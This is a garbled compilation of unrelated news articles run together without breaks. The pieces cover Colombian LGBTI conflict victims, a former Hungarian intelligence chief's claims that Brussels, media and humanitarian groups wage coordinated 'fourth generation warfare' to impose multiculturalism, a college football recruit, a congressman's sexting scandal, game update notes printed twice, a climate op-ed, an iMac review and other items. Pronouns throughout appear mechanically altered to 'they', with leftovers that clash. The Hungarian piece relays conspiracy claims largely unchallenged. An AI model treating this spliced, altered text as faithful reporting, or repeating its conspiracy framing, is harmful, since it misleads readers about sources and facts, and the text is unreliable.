They prefer to talk about the year 2000 onward, but with some observation we can pick up a few details about their past. “In 1999, I was persecuted for belonging to the state military,” says Andrea, who is transsexual. “I was a non-commissioned officer, and I fought for six and a half years … But that's all in the past.” Andrea says that where they are from is irrelevant. They have variously fled to Tolima province, Oslo, Milan and Bogotá.
“They gave me four hours to leave. In one of the towns in Tolima, I had a hairdressing salon and, because I refused to leave the town, four guys arrived, grabbed me by the hair and beat me up. They had sent me a note, but I had ignored it. I wasn't hurting anyone. That day they knocked me unconscious and left me lying on the floor.”
Andrea looked for a house in the Diana Turbay district in Bogotá. “That was around 2002. I was walking through the area when a guy stopped me and asked me my name. They asked for my documents and told me I had to leave. They were one of those men who had sent me away from the town, a paramilitary.”
That's when they changed their name. They asked a friend to lend them some money and they went to Oslo in Norway. “I arrived at the airport and they stopped me again. A police officer made me strip and kept me in a bathroom for three hours telling me to hand over the drugs! It was so degrading. I hadn't done anything wrong. Then I went to Milan. There nothing changed. The police held me for a whole night without water or anything, and I was there with my documents all in order. I went back to Colombia and everything carried on just the same.”
They say that they signed up for the reparation plan because they don't want to hide their true identity any more. And they talk about the military. “I signed up to the military, and I ended up in the school for non-commissioned officers. Of course, I was like a chameleon, always with a dual identity. At night time, I transformed into my real self … But then the ignorance and machismo started from certain people, and I had to leave and set up my hairdresser. Today the only thing I have left is my self-esteem.”
María Camila
They say they were “the first trans woman” in town. “There was a large gay community, but almost no trans,” they say. “That was a defining point for my town. Dabeiba [in Antioquia department] is too Catholic and religious. It was obviously not easy to accept someone like me. In 2007, those self-defense groups arrived to carry out social cleansing. At that time, there were two more trans girls in the village. One was physically assaulted and the other was killed. I wasn't going to wait to find out what would happen to me, so I fled to Medellín in 2008. There are still a lot of transphobic men there too.”
2013 LGBTI pride parade in Bogota — Photo: Diego Cambiaso
In Medellín they found work in a hairdresser. “As a stylist, I met more trans women and we founded Antioquia Trans, an association that worked with the whole LGBTI community in Medellín, which has suffered at the hands of the armed conflict. I think we deserve reparations. But that has to start with the way we are treated by civil servants. When I went to register as a victim, they told me, ‘You don't look like a displaced person, and you're not dressed like one either.' They looked as if they were scared of me, and I felt discriminated against. Being displaced doesn't mean you necessarily live in degrading conditions. And when I tell people, they say that I deserve it for being who I am … People are always on their guard. Getting rid of the stigma would be a good start for reparations.”
Adionel
On a farm in the outskirts of Paratebueno, Adionel sufferered many episodes of violence at the hands of the Centauros branch of the Colombian paramilitary group known as United Self-Defense Forces of Colombia. “It is the only municipality in the province of Cundinamarca with a llanero [plainsman/cowboy] culture. Every time one of those guys came by the farm, they would say things like, ‘You poof, if you want to know what a real man is, I'll bend you over.' They would come, abuse me and my sister who has Down Syndrome (they called their ‘that crazy girl'), steal everything we produced and then leave.”
In 1999, things got even worse, Adionel recalls. “This little guy that they called The Rat would come and tell me, ‘You poof, you are going to end up dead in a bag.' They threatened us with a gun, and touched us and everything … It wasn't just that, but the fact that they treated my little sister like that … We moved to the city because they made some really serious threats.”
Adionel is requesting reparation because they believe that if peace comes to Colombia, they could work without being discriminated against. “I have studied at the SENA [a national education service that promotes employment and training possibilities], and I am doing a Masters degree. But five years ago they sacked me from Paratebueno Town Hall just for being gay. Reparation is about more than just the money. I want processes to be put in place so that my municipality can be a peaceful land, and so that they stop seeing us like weirdos.”
Luis Miguel Hidalgo, alias The Rat, arrived in this region in 1999 and has 200 murders to their name. During trial, they confessed to massacres and rapes in the provinces of Meta and Cundinamarca. And they revealed the locations of seven mass graves to the district attorney's office.
The advocates
One of the reference points for the LGBTI community is the group Colombia Diversa, which has been fighting on behalf of this marginalized population since 2004. “The first challenge is the structure of the community and the visibility of the victims,” says the organization's lawyer, Mauricio Albarracín. “Institutions must be more flexible and encourage the creation of safe spaces for these people to be able to express their true identity. The peace process and a negotiated solution to the conflict, as well as protective measures for these communities, are urgently needed to stop the increasing levels of victimization.”
Albarracín adds that the fight for greater rights must be decentralized. “The majority of public policies about LGBTI rights are implemented in the large urban centers, and rural locations and other urban centers where the armed conflict has been more severe are forgotten.”
The Colombia Diversa lawyer agrees with the LGBTI victims that “the focus cannot remain solely in the Unit for Victims, but it must also include the district attorney's office, the public prosecution office, the military, Congress and civil society.”
Former intelligence chief László Foldi has said that forces conspiring to open Europe's borders are using the tactics of “fourth generation warfare” to turn the continent multicultural.
Former Director of Operations at the Hungarian Intelligence Services Foldi says the media, so-called humanitarian organisations, and Brussels work together to undermine Europe's borders.
Speaking on Kossuth Radio, the intelligence expert says that following the country's referendum in which 98.5 per cent of voters rejected Brussels's plans for mandatory migrant quotas they expect to see a “serious attack” on Hungary from three directions.
“One of them will be a formal political attack from Brussels, another one an informal attack with the help of the mainstream media, which will be a significant portion of the Western media outlets, but also the local media which are financed from outside of Hungary.”
The security expert says the third prong in the offensive is a “concrete attack” on the country's borders, in which “civilian organisations” mobilise migrants to the Hungarian border.
Mr. Foldi highlights how hundreds of migrants suddenly set off from Serbia to Hungary holding signs written in English and chanting demands for open borders following the referendum this week.
A television crew learned, before the migrant crowds left, that unidentified groups of Europeans had made a number of visits to Serbia's camps to tell migrants Hungary's borders will open after the vote, allowing them to enter Western Europe.
The spreading of such “outrageous lies”, Foldi asserts, are “not a random occurrence”. They report that the episode is just the latest in a pattern of so-called humanitarian groups spreading false information to mobilise migrants.
These organisations, Foldi argues, serve a dual purpose of promoting open borders activism as model behaviour. Depicted by the media as humanitarians, and their actions pushed as being morally “correct”, they say this “has an effect on the average citizen, who is taken in by it”.
The intelligence expert points out that spreading disinformation so as to rally crowds of migrants towards European borders is not actually a humanitarian thing to do, and more resembles a direct attack on state policy.
They ask: “Because would it not be more humane for the people who arrived in Belgrade — illegally, I might add, without any travel documents and visas — to suggest that they visit the Hungarian consulate there and ask for a visa.”
Questioning why a so-called humanitarian organisation would want to move migrant masses to the Hungarian border, Mr. Foldi says they are acting as part of a “well-established system, built years ago”.
“What we're seeing every day here is a fourth generation military operation against Europe. Not using traditional weaponry to enforce a strategy, but using economic and social infrastructure, and one element of that is the actions carried out by civilian humanitarian organisations,” they explain.
Mr. Foldi says Brussels directs “formal political attacks” on their nation's migrant policies because they “want to kill off at the roots any rebellious attitude, which is represented by Hungary, against a strategy they planned well ahead”.
Stating that Brussels's goal “is to convert Europe into a multicultural system, a system which is above nations”, Mr. Foldi argues that the EU is forcefully attacking Hungary because the country has taken concrete action to protect itself from being forced into multiculturalism.
They conclude: “This is well-coordinated; it is not separate that Brussels wants something, the MSM wants something, and the civilian organisations want something, too. But this is a very well-coordinated effort, where it is only that tasks are divided between the branches of the same attack force.”
Hungary's Prime Minister Victor Orbán last year slammed the role of so-called humanitarian bodies in mass migration to Europe.
They stated: “This invasion is driven, on the one hand, by people smugglers, and on the other by those [human rights] activists who support everything that weakens the nation-state. This Western mindset and this activist network are perhaps best represented by George Soros.”
Hungarian billionaire George Soros has admitted involvement in the crisis which saw over a million migrants enter the continent last year.
Four-star athlete Talanoa Hufanga announced their commitment to the 2018 USC Football recruiting class on Thursday, picking the Trojans over home-state Oregon.
USC Football's 2018 recruiting class got even stronger on Thursday as Talanoa Hufanga committed to the Trojans.
The four-star athlete announced their choice on Twitter.
USC announced their signing on Thursday night as well.
Hufanga rates as the 88th prospect in the nation in the 247Sports composite, but they are much more highly-regarded by the independent 247Sports ranking, rising to No. 16.  They are widely regarded as one of the best athletes in the class, ranking first in the 247Sports measure and second in the composite.
As the No. 1 recruit in the state of Oregon, USC did well to pry Hufanga from the hands of the Oregon Ducks, who were favorites to sign the player early in the fall. They also considered Michigan, Nebraska, UCLA and Utah as potential destinations.
The 6-foot, 193-pounder projects as a safety in college, adding another player with top-level physicality to the Trojan secondary.
The graduation of starter Chris Hawkins and contributor Matt Lopes, plus the potential NFL departure of Marvell Tell could create a clean slate for the safety position in 2018. USC pulled in two top safeties in the class of 2017, with Bubba Bolden and Isaiah Pola-Mao signing on in the spring. In 2016, they also added Jamel Cook and C.J. Pollard.
With the addition of Hufanga, the Trojans will have plenty of options to fill open spots with talent underclassmen. And Hufanga should have as much of a shot as anyone to jump right into the starting lineup.
TRENDING: Four Storylines to Watch for in the Cotton Bowl
USC's 2018 class is now 14 strong, including nine early signees who the Trojans secured signatures from during the Early Signing Period last week. Five-star linebacker Palaie Gaotote was among those who signed early, as the headliner in the class for the Trojans. With 2019 quarterback JT Daniels reclassifying to the class of 2018, Hufanga is the third-highest ranked commit on the board.
Rep. Joe Barton, R-Texas, told a woman to whom they sent sexually explicit photos, videos and messages that they would report them to Capitol Police if they made any of the material public, The Washington Post reported late Wednesday.
The anonymous woman shared a recorded phone call with the Post in which Barton admitted that if their relationship was exposed, they would tell investigators that "I had a three-year undercover relationship with you over the Internet that was heavily sexual and that I had met you twice while married and had sex with you on two different occasions and that I exchanged inappropriate photographs and videos with you that I wouldn't like to be seen made public, that you still apparently had all of those and were in position to use them in a way that would negatively affect my career."
The Post report was published after a nude photo of the 68-year-old Barton surfaced on social media, along with a lewd text message supposedly sent by the member of congress. Barton apologized earlier Wednesday, saying that before their divorce from their second wife was finalized, "had sexual relationships with other mature adult women. Each was consensual. Those relationships have ended."
In an additional statement late Wednesday, Barton said they had a consensual relationship with the woman, who "threatened to publicly share my private photographs and intimate correspondence" in retaliation for theirs breaking off the affair.
Barton added that the publication of the images may violate a "revenge porn law" passed in 2015 by Texas legislators. The law bans intentional disclosure of images or videos "depicting another person with the person's intimate parts exposed or engaged in sexual conduct."
"The transcript referenced in the Washington Post may be evidence" in such a case, Barton said, later adding "As the transcript reflects, I offered to take the matter to the Capitol Hill Police to open an investigation. Today, the Capitol Police reached out to me and offered to launch an investigation and I have accepted. Because of the pending investigation, we will have no further comment."
The woman told the Post that they came forward with the images because they felt Barton was "manipulative and dishonest and misleading" in their relationship with them and with other women."
"It's not normal for a member of Congress who runs on a GOP platform of family values and conservatism to be scouring the Internet looking for a new sexual liaison," they told the paper.
Click for more from The Washington Post.
Fox News' Mike Emanuel contributed to this report.
This man photographs Maine Coon cats and makes them look like majestic mythical beasts (Gallery)
This is the stuff of legend.
courtesy of photographer Robert Sijka
The man who takes these glorious photos is Robert Sijka.
"My passions are cats and photography, I do my best to combine these two things as good as possible," they share on their website.
Oh, they did an excellent job. Each of these cats I would follow to the end of the world. I would battle dragons and go on dangerous quests against mythical monsters... if these cats told me to do so. They're... magical.
Here are some of our favorites from their site.
1.
courtesy of photographer Robert Sijka
2.
courtesy of photographer Robert Sijka
3.
courtesy of photographer Robert Sijka
4.
courtesy of photographer Robert Sijka
5.
courtesy of photographer Robert Sijka
6.
courtesy of photographer Robert Sijka
7.
courtesy of photographer Robert Sijka
8.
courtesy of photographer Robert Sijka
9.
courtesy of photographer Robert Sijka
10.
courtesy of photographer Robert Sijka
11.
courtesy of photographer Robert Sijka
12.
courtesy of photographer Robert Sijka
13.
courtesy of photographer Robert Sijka
14.
courtesy of photographer Robert Sijka
15.
courtesy of photographer Robert Sijka
16.
courtesy of photographer Robert Sijka
17.
courtesy of photographer Robert Sijka
18.
courtesy of photographer Robert Sijka
19.
courtesy of photographer Robert Sijka
All of them are just absolutely gorgeous! Be sure to check out Robert's website and follow them on Facebook and Twitter for more glorious photos!
Article by SA_Upc, 雲/kumomo on April 20, 2015
http://pad.gungho.jp/member/update7_8_1.html
http://pad.gungho.jp/member/150422_sinka.html
Some notable changes:
- Awoken Shiva will get 3x ATK at 6+ combo (
- Awoken Meimei active now changes board into Wood, Light, Dark orbs. But instead of wood orb enhance, it now reduces cooldown of other active skills by 1.
- Ult Durga LS now deals 5x ATK when matching 4 of Fire, Water, Wood, Dark, and Heal orbs. No more 3.5x ATK.
- Xuanzang maximum cooldow reduced by 3
Edit: Sakuya changes have been removed.
=====
From the JP Aamir Descended stream.
Comprehensive stream summary can be found from
Stream images courtesy of Michael Xhr:
News for first half, some FF collab character art.
FF10 - Tidus
FF0 - Ace
Mobius FF - Wal
=====
More from FF Portal App:
Evolved form Cloud
Squall
Rinoa
Zidane
Stat/skills are subject to change until release:
Cloud
Attacker
Active: Reduce cooldowns of other skills by 2. 20x Light nuke to all enemies.
LS: 2x HP/ATK to Attacker types. 1.5x ATK after using an active skill
Squall
Attacker
Active: Reduce cooldowns of other skills by 1. 50x nuke to an enemy.
LS: Increase ATK after 3 combos, up to 8.5x
Rinoa
Healer / Devil
Active: Reduce cooldowns of other skills by 1. Randomly active a skill (from a set pool)
LS: HP/ATK boost to Healer types. Increase ATK after 1 Water combo, up to 4x ATK
Zidane
Attacker
Active: Reduce cooldowns of other skills by 1. Randomly active a skill (from a set pool)
LS: 3x ATK to Wood and Light cards. Increase orb movement timer by 2 seconds
=====
- Legend Dungeon (previously known as rogue dungeon) will appear as special descended dungeon. Cards will still enter the dungeon at level 1 and level up.
- First of these Legend Dungeons will feature Legend Zaerog
- A new, Machine type will be added soon. Due to the new Machine type, some cards will be able to have up to 3 types.
- Next update will decrease app size.
- Dungeon result screens for egg drops can be skipped.
- 4 new restriction dungeons to be added to Endless Corridor
=====
New ultimates:
Ult Cao Cao #1 /
LS: 1.35x HP, 3x ATK to Attacker types. Increase RCV by 1.5x after using a skill
Ult Cao Cao #2 /
Dragon / Attacker
Awoken Shiva /
Attacker / Devil
Active (12cd max): Def reduction (not sure on %) and enhance both Fire and Heal orbs.
LS: 1.5x ATK/RCV to Fire cards. Increase ATK after 4 combos, up to 3x ATK
Evo Requirements :
Ult Durga /
God / Devil
LS: 3.5x ATK when attacking with any 3 of Fire, Water, Wood or Dark orbs. 5x ATK when attacking with all 4.
Awoken Mei Mei /
Physical / Attacker
Active (10cd max): Change board into Wood, Light, Dark orbs. Enhance Wood orbs.
LS: 3.5x ATK when attacking with Wood, Light, Dark. Reduce Wood, Light, Dark damage taken by 25% (may change)
New card, Tsubaki.
4/22 JP official site updateSome notable changes:- Awoken Shiva will get 3x ATK at 6+ combo ( YamaP tweet ) with 1.5x ATK/RCV to fire card. Multiplier increasing starting from 4 combos up to 4.5x ATK at 6+ combo for fire cards.- Awoken Meimei active now changes board into Wood, Light, Dark orbs. But instead of wood orb enhance, it now reduces cooldown of other active skills by 1.- Ult Durga LS now deals 5x ATK when matching 4 of Fire, Water, Wood, Dark, and Heal orbs. No more 3.5x ATK.- Xuanzang maximum cooldow reduced by 3Edit: Sakuya changes have been removed.=====From the JP Aamir Descended stream.Comprehensive stream summary can be found from Nez's thread on PF Stream images courtesy of Michael Xhr:News for first half, some FF collab character art.FF10 - TidusFF0 - AceMobius FF - Wal=====More from FF Portal App:Evolved form CloudSquallRinoaZidaneStat/skills are subject to change until release:CloudAttackerActive: Reduce cooldowns of other skills by 2. 20x Light nuke to all enemies.LS: 2x HP/ATK to Attacker types. 1.5x ATK after using an active skillSquallAttackerActive: Reduce cooldowns of other skills by 1. 50x nuke to an enemy.LS: Increase ATK after 3 combos, up to 8.5xRinoaHealer / DevilActive: Reduce cooldowns of other skills by 1. Randomly active a skill (from a set pool)LS: HP/ATK boost to Healer types. Increase ATK after 1 Water combo, up to 4x ATKZidaneAttackerActive: Reduce cooldowns of other skills by 1. Randomly active a skill (from a set pool)LS: 3x ATK to Wood and Light cards. Increase orb movement timer by 2 seconds=====- Legend Dungeon (previously known as rogue dungeon) will appear as special descended dungeon. Cards will still enter the dungeon at level 1 and level up.- First of these Legend Dungeons will feature Legend Zaerog- A new, Machine type will be added soon. Due to the new Machine type, some cards will be able to have up to 3 types.- Next update will decrease app size.- Dungeon result screens for egg drops can be skipped.- 4 new restriction dungeons to be added to Endless Corridor=====New ultimates:Ult Cao Cao #1LS: 1.35x HP, 3x ATK to Attacker types. Increase RCV by 1.5x after using a skillUlt Cao Cao #2Dragon / AttackerAwoken ShivaAttacker / DevilActive (12cd max): Def reduction (not sure on %) and enhance both Fire and Heal orbs.LS: 1.5x ATK/RCV to Fire cards. Increase ATK after 4 combos, up to 3x ATKEvo Requirements : Ult DurgaGod / DevilLS: 3.5x ATK when attacking with any 3 of Fire, Water, Wood or Dark orbs. 5x ATK when attacking with all 4.Awoken Mei MeiPhysical / AttackerActive (10cd max): Change board into Wood, Light, Dark orbs. Enhance Wood orbs.LS: 3.5x ATK when attacking with Wood, Light, Dark. Reduce Wood, Light, Dark damage taken by 25% (may change)New card, Tsubaki.
The Federal Reserve is preparing for the consequences of the U.S. government defaulting on its debt obligations, Reuters reports.
"We are in contingency planning mode," Philadelphia Federal Reserve Bank President Charles Plosser told Reuters in an interview at the regional central bank's headquarters in Philadelphia. "We are all engaged ... It's a very active process."
The Fed clears all of the government's checks, so it must determine which will and won't be honored once the debt limit hits on August 2nd.
"We are developing processes and procedures by which the Treasury communicates to us what we are going to do," Plosser said, adding that the task was manageable. "How the Fed is going to go about clearing government checks. Which ones are going to be good? Which ones are not going to be good?"
Read the full report here:
You would have to be a fool to deny that the climate is changing.
Hurricane Harvey was the biggest rain event ever to hit the continental United States and wreaked havoc in Texas at a cost likely to exceed all previous storms on record. Hurricane Irma, was the strongest Atlantic hurricane ever observed. Additionally, two weeks of flooding have devastated communities across India, Nepal and Bangladesh.
Globally, 2014 would have been the hottest year on record if 2015 hadn't surpassed it. And 2015 would have been the hottest, if it hadn't been for 2016
ADVERTISEMENT
The Antarctic recently saw the largest iceberg — nearly the size of Delaware — break off from the continental ice shelf. And the Arctic Ocean is on the verge of becoming ice free.
Despite all the overwhelming evidence, we have a president, who tweeted in 2012 that “The concept of global warming was created by and for the Chinese in order to make U.S. manufacturing non-competitive.”
And their sidekick, Scott Pruitt Edward (Scott) Scott PruittEPA knows this pesticide is dangerous, so why did it reverse the ban? Archives investigation finds no ‘secret' Pruitt calendars existed California has sued the Trump administration 46 times. Here are the lawsuits MORE, who heads the Environmental Protection Administration, has made a mockery of climate science in a trifecta:
By denying that carbon dioxide is “a primary contributor” to global warming
By removing academic scientists from the EPA Science Advisory Board
By removing webpages that provide access to climate change information and data on the EPA website
We do not expect our political leaders to be experts on everything, but we do expect them to have knowledgeable advisors who can help them understand things they don't know or haven't studied. If they only have poor advisors, or if they don't pay attention to the good ones, we get what we seem to have on climate change, which in truth is not so hard to understand, at least at a cursory level.
Since nearly all the energy that heats the earth comes from the sun, almost any high-school student who has taken an AP physics course can calculate what the average temperature of our planet would be without the greenhouse effect and compare it to what we actually have.
Our high-school student can determine that the average temperature of the earth with no greenhouse effect would be about 5 degrees below zero in Fahrenheit. Instead, it is 60 degrees above zero. The difference is the greenhouse effect.
You can play the same game with Mars, and you will find its average temperature would be 60 degrees below zero. Mars has almost no atmosphere, so it has no greenhouse effect. And the average, as expected, is 60 degrees below zero.
The same analysis for Venus predicts an average temperature of 100 degrees above zero. But the actual temperature is about 700 degrees above zero, about the same as a self-cleaning oven. Venus has a very dense atmosphere composed mostly of carbon dioxide and a runaway greenhouse effect.
The greenhouse effect, itself, is real. The question is how does adding greenhouse gas to the atmosphere change the temperature? The Intergovernmental Panel on Climate Change has been studying the problem for almost 30 years.
In its 5th Assessment issued in 2009, the IPCC concluded that with business as usual the average global temperature would rise by the end of the century between 5 and 10 degrees Fahrenheit with a mean value of about 7 degrees. It would rise by about twice that in the Arctic.
Investing in real estate above the Arctic Circle might be a real long-term winner, but at our latitude, where it will be very hot, it would be a loser. Tropical diseases will move north, and life will be very uncomfortable without both very good air conditioning and medical treatment.
There are knowledgeable people who say the temperature increase is overestimated. There are others who think it is underestimated. We need much work to improve forecasting, and we need to support it well.
But hiding the data or suppressing discussion as Pruitt seems bent on doing helps no one, other than people who hope to make money following a business as usual scenario. For the rest of us, Pruitt seems to have little or no use.
But if they were willing to listen, we would remind them that saving the planet can actually save money. For example, electricity generated from natural gas or some other low-emission sources costs less than electricity generated from coal. And that's before factoring in the health care costs.
A 2010 report from the National Academy of Science, “Hidden Costs of Energy,” estimated that health effects and losses in agriculture from coal burning cost the nation about $62 billion per year, far more than the hidden costs from any other energy source.
Clean coal — which President Trump and Pruitt believe is a panacea — does not exist in any realizable form. Without deploying extremely costly, untested and largely impractical technologies that can remove all the very small particulates from the smoke stack and all the greenhouse gases, too, coal would be even more of an economic loser than it already is.
For coal, our advice is to let capitalism take its course. Let's find other ways to deal with the health and future of the miners — perhaps, as a first step to follow Senate Majority Leader Mitch McConnell Addison (Mitch) Mitchell McConnellHouse to push back at Trump on border Democrats block abortion bill in Senate Overnight Energy: Climate protesters storm McConnell's office | Center-right group says Green New Deal could cost trillion | Dire warnings from new climate studies MORE and federalize the cost of their health insurance.
Tackling climate change is a remarkable opportunity. Doing something about it now can actually begin to save us money. Denying its existence only makes deniers look like fools.
Burton Richter is an emeritus professor of physical sciences at Stanford, a Nobel Laureate and National Medal of Science winner and the author of “Beyond Smoke and Mirrors: Climate Change and Energy in the 21st Century.”
Michael S. Lubell is a physics professor at City College of the City University of New York and the author of the forthcoming book, “Science and Technology Policy: A Practical Guide to Navigating the Maze.”
The views expressed by contributors are their own and are not the views of The Hill.
Sen. Jeff Sessions is Donald Trump's Attorney General pick. For us, the greatest concern is how Sessions views federal power under the Constitution.
Marijuana provides a really good barometer on how someone views the proper role of the federal government vs the states under the constitution. While more states have defied the feds on weed than on any issue at any time in history, there are some who still want to flex federal muscle and force a one-size-fits-all national decision.
This comes from both sides of the issue.
Some legalization advocates want to use the power of Washington D.C. to force a legalization across the entire country. On the other side, some want to use federal power to shut down whatever the states try to do. Under the Constitution, both are wrong.
President-elect Trump repeatedly pledged to respect state marijuana laws if elected president. But their AG pick, Jeff Sessions, is one of the most hostile voices in Washington against such policies.
Sessions, a former U.S. attorney, criticized President Obama for their administration's approach to the issue. “His lax treatment and comments on marijuana, it's been obvious, it reverses 20 years almost of hostility to drugs, begun really, when Nancy Reagan started the ‘Just Say No' program,” the senator said.
This is bad on two levels.
First of all, Pres. Obama did not give the states “lax treatment” on marijuana. In fact, they were more aggressive and anti-10th Amendment than their two predecessors combined. This statement shows Sessions is either a liar or doesn't know what he's talking about. They clearly oppose choices made by the people of each state, and is hostile to the balance of powers under the Constitution.
Now, as AG, they might have to rein in their own personal views and follow the promised policy goals of their new boss, but there's no way to know right now because the AG usually has a lot of independent policy authority and prosecutorial discretion.
What is absolutely certain is that Sessions doesn't respect the 10th Amendment on marijuana. And because of that, they shouldn't be trusted with power on other issues either.
Michael Boldin [send them email] is the founder of the Tenth Amendment Center. They were raised in Milwaukee, WI, and currently resides in Los Angeles, CA. Follow them on Twitter – @michaelboldin and Facebook. http://www.tenthamendmentcenter.com
miniature horse.png
Christy Israel reported their miniature horse, Sky, missing from their Houser Street home to the Montgomery County Humane Society early the morning of Saturday, Oct. 24. The horse was found later the same day. (Montgomery County Humane Society)
A Montgomery woman claims four neighbors stole their miniature horse on Saturday in an attempt to sell it for methamphetamine.
Christy Israel reported their beloved pet, Sky, missing from their Houser Street home early Saturday morning to the Montgomery County Humane Society.
The animal was located the same afternoon, about 10 miles away on Longview Court in west Montgomery, Humane Society investigator Robert Bryant confirmed to AL.com. The horse was "perfectly healthy.
"I firmly believe the horse was stolen," they said. "The common theory right now is that they were trying to sell it. Once they realized they couldn't sell it, they dropped it off."
Bryant said there is no way the horse could have escaped its enclosure and traveled 10 miles through downtown Montgomery and crossed Interstate 65 on its own and without being seen. The area where the horse was found is a common dumping ground for animals, they said.
The horse was located by residents who saw it walking down the street, they said.
Bryant said the horse's owner told them thieves kicked in their back gate to take the horse.
Israel told WSFA that four men who live in their neighborhood took the horse with the intent of selling it for $150. They planned to use that money to buy meth, they said.
They claim one of the thieves confessed the plot to them
Bryant said they couldn't confirm those allegations.
"We are collecting evidence and information," they said, adding that since the incident didn't involve animal abuse, the evidence would be turned over to Montgomery police.
Vintage turbines flanked by the new models increasingly replacing them.
Bringing the birthplace of wind power into the 21st century
I remember when my dad got their first “car phone.” It was bulky, required an antenna on the window and only worked once in a while. The iPhones we carry in our pockets today, made with three decades of product development, seem otherworldly by comparison.
There's a similar technology comparison playing out across California.
American wind power was born in the Golden State, where the first large-scale wind farms were built in the 1980's. Many still generate electricity today, more than 30 years later. But through a process known as repowering, companies are starting to replace vintage turbines with modern equipment.
The transition is akin to moving from a “car phone” to an iPhone.
NextEra Energy and Sonoma Clean Power just broke ground on a full repowering at the Golden Hills North wind farm, replacing 283 turbines from the 80's with just 20 modern ones capable of generating significantly more electricity.
“[This] allows us to breathe new life into an old project, reduce the impact on the environment, and provide good jobs and meaningful economic benefits for the local economy,” said Daryl Hart, director of development for NextEra Energy Resources.
Other companies are repowering old California projects too. EDF Renewable Energy recently upgraded the Shiloh IV wind farm, originally built in 1989. Just 50 new turbines replaced 235 old machines while quadrupling the project's capacity to generate electricity.
Elsewhere in California, 21 modern turbines replaced 145 vintage machines at the San Gorgonio project in Riverside County in 2015.
American innovation is on full display at these projects. Decades ago, wind power pioneers figured out a way to generate electricity out of thin air. Through research, entrepreneurship and hard work, today's turbines are more cost-effective, more reliable, and generate vastly more electricity— 22 times more electricity than an average turbine installed in 1990.
Keep track of all of the latest repowering news in our Quarterly Market Reports.
Andrew Cunningham
Lee Hutchinson
Lee Hutchinson
Lee Hutchinson
A couple of weeks back, we took a look at the new 21.5-inch 4K iMac. It's a solid desktop with a great screen, though its default configuration leaves something to be desired (particularly its slow 5400RPM hard drive).
If you really ask a lot of your computing equipment, though, there's still no substitute for the 27-inch 5K version. More divides the small and large iMacs than ever before: the 27-inch versions include new Skylake processors from Intel, while the 21-inch versions use the older Broadwell architecture. You can only get dedicated GPUs in the 5K iMacs. The Mac Pro is still Apple's fastest Mac if your workloads routinely max out multiple CPU cores and GPUs, but for other power users and pros the 27-inch iMac is the one to get.
The outside
We're going to keep this really, really short, because very little has changed about the exterior of the 5K iMac. Even some of the internal upgrades that were new to the 21.5-inch models—Thunderbolt 2, for one—were already included in the 27-inch model last year.
Specs at a glance: 27-inch 2015 5K iMac Screen 5120×2880 27" IPS display (217 ppi) OS Mac OS X 10.11.1 CPU 4.0GHz Intel Core i7-6700K (Turbo Boost 4.2GHz) RAM 32GB 1867MHz DDR3 GPU AMD Radeon R9 M395X with 4GB GDDR4 RAM Storage 1TB NVMe SSD, four PCIe 2.0 lanes Networking 1.3Gbps 802.11ac, Bluetooth 4.0, gigabit Ethernet Ports 4x USB 3.0, 2x Thunderbolt 2, headphone jack, SD card slot Size 20.3 x 25.6 x 8 inches (51.6 x 65.0 x 20.3 cm) Weight 21 lbs (9.54 kg) Starting price $1,799 As reviewed $4,099 Other perks FaceTime HD camera, dual noise-canceling mics, ambient light sensor, Kensington lock slot
One improvement is a wider color gamut, the same one we saw in the 4K iMac. Previous iMacs used the sRGB color space, but the new Retina models support "over 99 percent" of the DCI-P3 color space common in digital movie theaters. DCI-P3 encompasses the entire sRGB color space but is capable of displaying more shades of red and green (which also affects secondary and tertiary colors like yellow, orange, magenta, and cyan, though blues in DCI-P3 are roughly the same as in sRGB).
To support this wider color gamut, Apple has switched away from using standard white LEDs for backlighting, which typically combine a blue LED with a yellow phosphor to create white. Apple is now using red-green phosphor LEDs to expand the color gamut, a strategy previously demonstrated by LCD makers like Sharp.
Also new are the input devices, the Magic Keyboard, Magic Mouse 2, and Magic Trackpad 2. All three replace AA batteries with rechargeable li-ion versions. The mouse looks pretty much the same, but the keyboard and trackpad are both slimmed down and streamlined.
Lightning cables are used to recharge the accessories, but they'll also carry data when connected to your Mac. This obviates the need for separate wired and wireless versions, since any wireless accessory effectively becomes a wired accessory when you plug it in (that said, the placement of the Lightning port on the bottom of the Magic Mouse 2 makes this impractical). When you plug in the accessories to a Mac running El Capitan, they'll also automatically pair with it.
The keyboard and mouse are included with all iMacs for no additional charge, but the trackpad will cost $50 extra.
The inside
Here's where we get to the fun stuff. The new iMacs jump two CPU generations, one GPU generation, and double the amount of storage bandwidth that the old ones had.
Apple sent us the fastest version of the 27-inch iMac that it makes, complete with 32GB of RAM and a 1TB SSD—this computer retails for an eye-popping $4,099, though a full $1,300 of that is wrapped up in storage and memory upgrades. It's pricey, but boy is it fast.
The CPU is a Core i7-6700K, a 4.0GHz (4.2GHz Turbo) high-end, quad-core Skylake CPU that we've actually already reviewed. Intel's year-over-year CPU performance gains have slowed in recent years, so if you've already got a similarly clocked Haswell chips the gains are relatively small. If you're replacing a quad-core iMac from 2010 or 2011, you can expect to see some more significant boosts. We pulled results for half a decade of high-end iMacs (plus the fastest 4K iMac with Broadwell) from the Geekbench results database to illustrate.
This iMac also widens the performance gap between it and the quad-core version of the Mac Pro—with the 6700K, it's the undisputed single-core performance champion, the fastest processor you can get in any Mac in the entire lineup. Multithreaded tasks still do better with more cores, though, so if you want 6, 8, or 12 CPU cores, the Mac Pro is still the only way to go. The 5K iMac actually stands up fairly well to the 6-core Mac Pro, but the 8- and 12-core versions still blow it away. If Apple ever gets around to updating its pro desktop again, Intel even has single-socket Xeon CPUs with 14, 16, and 18 cores now.
Listing image by Andrew Cunningham
Abstract
Background Increasing studies have revealed the dopamine transporter (DAT) availability altered in striatum associated with major depression. However, the results remain inconsistent.
Methods To assess the alteration of striatal DAT availability in major depression, we performed a meta-analysis based on 12 case-control molecular imaging studies, including a total of 209 depressed patients and 314 healthy controls. Hedges׳ g and corresponding 95% confidence intervals (CIs) for striatal DAT availability in major depression compared with controls were estimated.
Results Our meta-analysis revealed no evidence for the alteration of striatal DAT availability in major depression (Hedges׳ g=0.09, CI 95% from −0.43 to 0.61, P=0.73). Meta-regression analyses suggested that there were no moderating effects for age, gender, year of publication, sample size, medication exposures and severity of depression on the hedges׳g values for striatal DAT availability.
Limitations The results should be treated with caution because of the significant heterogeneity and the potential interference of confounding factors in this meta-analysis.
A United Nations inquiry found that North Korea's human rights abuses include murder, enslavement, torture, imprisonment, and rape, while Amnesty International says that the country is “in a category of its own when it comes to human rights violations”.
But the totalitarian government has hit back at the UN for planning to discuss Pyongyang's human rights record and argues that the country guarantees “true freedom and rights” to its people.
